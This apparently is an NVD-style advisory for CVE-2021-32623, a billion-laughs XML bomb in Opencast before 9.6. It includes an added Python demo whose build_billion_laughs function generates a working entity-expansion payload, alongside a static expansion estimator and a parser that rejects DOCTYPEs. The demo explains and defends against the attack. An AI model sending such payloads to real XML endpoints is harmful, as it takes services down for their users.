High severity · NVD Advisory · Published Jun 15, 2021 · Updated Aug 3, 2024
Opencast vulnerable to billion laughs attack (XML bomb)
CVE-2021-32623
Description
Opencast is a free and open source solution for automated video capture and distribution. Versions of Opencast prior to 9.6 are vulnerable to the billion laughs attack (recursive XML entity expansion), which lets an attacker easily mount a denial of service that appears permanent, essentially taking down Opencast with a single HTTP request. Exploitation requires ingest privileges, which limits the group of potential attackers. The problem has been fixed in Opencast 9.6. There is no known workaround for this issue.
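The attack described above, as an added example that is not code from this page or from the Opencast project: a Python script that builds the classic billion-laughs payload, shows that a stock entity-expanding parser really does inflate it (on a small variant), estimates the full expansion from the DTD without expanding anything, and rejects such a document the way a hardened ingest endpoint should. The `lolz` element names, the `mediapackage` sample document and the ingest wording are constructed for the demo and are not taken from Opencast.

```python
"""Billion laughs (XML entity expansion) in practice.

Added example, not Opencast code. A few hundred bytes of nested entity
declarations expand to gigabytes, which is why one request can take a
server down.
"""
import re
import xml.parsers.expat
from xml.etree import ElementTree as ET

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')
DOCTYPE = re.compile(r'<!DOCTYPE\b[^\[>]*(?:\[.*?\])?\s*>', re.DOTALL)
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "quot": 1, "apos": 1}


def build_billion_laughs(depth=9, fanout=10, seed="lol"):
    """Constructed payload: lol0 = seed, lolN = fanout copies of lol(N-1).
    The root element references the top entity, so the document expands to
    fanout**depth copies of the seed (10**9 for the defaults)."""
    decls = [f'<!ENTITY lol0 "{seed}">']
    for level in range(1, depth + 1):
        ref = f"&lol{level - 1};" * fanout
        decls.append(f'<!ENTITY lol{level} "{ref}">')
    dtd = "".join(decls)
    return (f'<?xml version="1.0"?><!DOCTYPE lolz [{dtd}]>'
            f'<lolz>&lol{depth};</lolz>')


def naive_parse(xml_text):
    """What an unhardened parser does: expands every entity into memory.
    Returns the length of the expanded root text. Only call this with a
    small depth; the parser really allocates the full expansion."""
    root = ET.fromstring(xml_text)
    return len(root.text or "")


def estimated_expansion(xml_text):
    """Bytes the document body would expand to, computed from the internal
    DTD without expanding anything (each entity is sized once, recursively).
    Cyclic or undeclared references raise, as an XML parser would reject them."""
    m = DOCTYPE.search(xml_text)
    decls = dict(ENTITY_DECL.findall(m.group(0))) if m else {}
    body = xml_text[m.end():] if m else xml_text
    sizes = dict(PREDEFINED)

    def size_of(name, stack=frozenset()):
        if name in sizes:
            return sizes[name]
        if name in stack:
            raise ValueError(f"recursive entity &{name};")
        if name not in decls:
            raise ValueError(f"undeclared entity &{name};")
        value = decls[name]
        total = len(ENTITY_REF.sub("", value).encode("utf-8"))
        for ref in ENTITY_REF.findall(value):
            total += size_of(ref, stack | {name})
        sizes[name] = total
        return total

    return sum(size_of(ref) for ref in ENTITY_REF.findall(body))


def hardened_parse(xml_text):
    """Parse untrusted XML while refusing any DOCTYPE (and therefore any
    entity declaration) before expat can expand it. Returns the root tag."""
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE not accepted in uploaded XML")

    def reject_entity(*args):
        raise ValueError("entity declarations not accepted in uploaded XML")

    def start_element(name, attrs):
        if not seen:
            seen.append(name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity  # belt and braces
    parser.StartElementHandler = start_element
    parser.Parse(xml_text, True)
    return seen[0]


if __name__ == "__main__":
    payload = build_billion_laughs()
    print(f"payload is {len(payload)} bytes, would expand to "
          f"{estimated_expansion(payload):,} bytes")
    print("3-level variant expands to",
          naive_parse(build_billion_laughs(depth=3)), "bytes")
    try:
        hardened_parse(payload)
    except ValueError as e:
        print("hardened parser refused it:", e)
```

The default payload is well under a kilobyte and expands to three gigabytes of text, which is the amplification the advisory is describing. Rejecting the DOCTYPE outright is the simplest robust defence for an upload endpoint that never needs DTDs; the static estimator is for the rarer case where internal DTDs must be accepted and an expansion cap is enforced instead. The JAXP equivalent of `hardened_parse` is enabling the `http://apache.org/xml/features/disallow-doctype-decl` feature on the parser factory; that is the general Java counterpart, not a description of what the Opencast 9.6 commits changed.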
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.opencastproject:opencast-kernel | Maven | < 9.6 | 9.6 |
Patches: 2 (the two fix commits are listed under References)
References (5)
- GitHub advisory database entry: github.com/advisories/GHSA-9gwx-9cwp-5c2m
- NVD entry: nvd.nist.gov/vuln/detail/CVE-2021-32623
- Fix commit: github.com/opencast/opencast/commit/16b0d641713fe31b8518fcf14fc5e4e815d81206
- Fix commit: github.com/opencast/opencast/commit/8ae27da5a6f658011a5741b3210e715b0dc6213e
- Opencast project advisory: github.com/opencast/opencast/security/advisories/GHSA-9gwx-9cwp-5c2m